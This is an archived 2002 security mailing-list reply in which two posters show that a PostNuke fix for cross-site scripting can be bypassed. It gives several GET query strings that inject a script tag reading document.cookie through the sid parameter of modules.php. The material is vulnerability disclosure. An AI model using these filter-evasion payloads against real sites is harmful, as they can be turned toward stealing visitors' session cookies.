Re: Postnuke XSS fixed

• Previous message: secureat_private: "[CLA-2002:529] Conectiva Linux Security Announcement - XFree86"
• In reply to: Daniel Woods: "Re: Postnuke XSS fixed"
• Next in thread: Muhammad Faisal Rauf Danka: "Re: Postnuke XSS fixed"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I saw the problem has been solved, and the get you proposed below are no
more working. But if you use the following get, the popup appears again:

on the url http://news.postnuke.com/modules.php

the get

?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>

Best Regars,

Sebastian

Daniel Woods wrote:

  >Humm!
  >
  >
  >
  >
  >Not so fast on the praise :(
  >
  >It only took me a couple of workarounds to find ways to bypass the check.
  >
  >  http://news.postnuke.com/modules.php
  >	
?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
  >
  >Using the request...
  >	
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
  >gives me the DB Error: message
  >
  >And using the request...
  >	
?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
  >gives me the Alert Popup and DB Error: message...  the '+' is treated
as a blank.
  >
  >Thanks... Dan.
  >
  >
  >

-- 
Sebastian Konstanty Zdrojewski
IT Analyst

Neticon a brand of Every Level S.r.l.
Via Valtellina 16 - 20159 Milano - MI - Italy

Phone    (+39) 02.68.80.731
E-Mail   s.zdrojewskiat_private
Website  http://www.neticon.it

• Next message: Roy Kidder: "Re: Solaris 2.6, 7, 8"
• Previous message: secureat_private: "[CLA-2002:529] Conectiva Linux Security Announcement - XFree86"
• In reply to: Daniel Woods: "Re: Postnuke XSS fixed"
• Next in thread: Muhammad Faisal Rauf Danka: "Re: Postnuke XSS fixed"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Oct 03 2002 - 12:16:20 PDT